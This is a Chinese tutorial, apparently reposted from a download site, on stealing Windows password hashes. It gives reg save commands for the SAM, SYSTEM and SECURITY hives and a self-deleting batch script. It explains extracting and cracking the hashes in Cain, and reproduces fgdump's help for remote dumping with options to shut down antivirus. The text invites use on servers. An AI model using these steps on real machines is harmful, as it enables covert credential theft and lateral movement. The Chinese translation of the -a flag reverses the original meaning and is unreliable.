
  • A+


用到的工具有pwdump7.exe、GetHashes.exe、SAMInside.exe、LC5、Cain、Proactive Password Auditor、Ophcrack.
 使用工具 cain、cmd、wce1.2等
 reg save hklm\sam sam.hive
 reg save hklm\system system.hive
 reg save hklm\security security.hive
 @echo off
reg save hklm\sam sam.hive
reg save hklm\system system.hive
reg save hklm\security security.hive
del %0
然后我们使用CAIN打开保存到的system.hive 和security.hive两个文件。我是在虚拟机里面操作就直接在虚拟机里面搞了。。大家在服务器上搞可以下载到本地。
 打开CAIN选择LSA Secrets然后打开system.hive 和security.hive两个文件
拿到HASH了,www.jb51.net 下面就是破解,用工具自带的破解试试密码出来了,我设置的123456
从帮助来看我们可以使用-l参数查看NTML hash
fgdump 可以远程抓Hash的工具
 fgDump 2.1.0 - fizzgig and the mighty group at foofus.net
Written to make j0m0kun's life just a bit easier
Copyright(C) 2008 fizzgig and foofus.net
fgdump comes with ABSOLUTELY NO WARRANTY!
This is free software, and you are welcome to redistribute it
under certain conditions; see the COPYING and README files for
more information.
fgdump [-?][-t][-c][-w][-s][-r][-v][-k][-o][-a][-O 32|64][-l logfile][-T threads] [{{-h Host | -f filename} -u Username -p Password | -H filename}]
where Username and Password have administrator credentials
-? displays help (you're looking at it!)
-t will test for the presence of antivirus without actually running the password dumps
-c skips the cache dump
-w skips the password dump
-s performs the protected storage dump
-r forgets about existing pwdump/cachedump files. The default behavior is to skip a host if these files already exist.
-v makes output more verbose. Use twice for greater effect
-k keeps the pwdump/cachedump going even if antivirus is in an unknown state
-l logs all output to logfile
-T runs fgdump with the specified number of parallel threads
-h is the name of the single host to perform the dumps against
-f reads hosts from a line-separated file
-H reads host:username:password from a line-separated file (per-host credentials)
-o skips pwdump history dumps
-a will not attempt to detect or shut down antivirus, even if it is present
 -O manually sets whether the target is a 32- or 64-bit OS. Note that this applies to all hosts specified.
** As of version 1.4.0, you can run fgdump with no parameters to dump the local box (no impersonation or binding)
fgdump [-?][-t][-c][-w][-s][-r][-v][-k][-o][-a][-O 32|64][-l logfile][-T threads] [{{-h Host | -f filename} -u
 Username -p Password | -H filename}]
 -? 显示帮助
-t 测试当前的杀毒软件,并不是真正的转储密码
-c 跳过缓存转储
-w 跳过密码转储
-s 执行保护存贮转储
-r 忽略现存的pwdump/cachedump文件。默认的行为是跳过存在这些文件的主机。
-v 详细输出. 使用两次能获得更为详细的输出
-k 即使不知道杀毒软件的状态也继续执行pwdump/cachedump(进行密码转储)
-l 记录所有输出到日志文件
-T 使用指定数量的线程执行此程序
-h 需要执行密码转储的单个目标主机
-f 从用行分隔的文件中读取主机列表
-H 从用行分隔的文件中读取 主机名:用户名:密码
-o 跳过转储历史密码
-a 试图检测或关闭杀毒软件,即使杀毒软件正在运行
 -O 手工设置远程主机是32位操作系统还是64位操作系统。 注意:这项操作应用到所有指定的主机。
 ** 使用1.4.0,你可以直接运行此程序,不需要带参数,来转储本机密码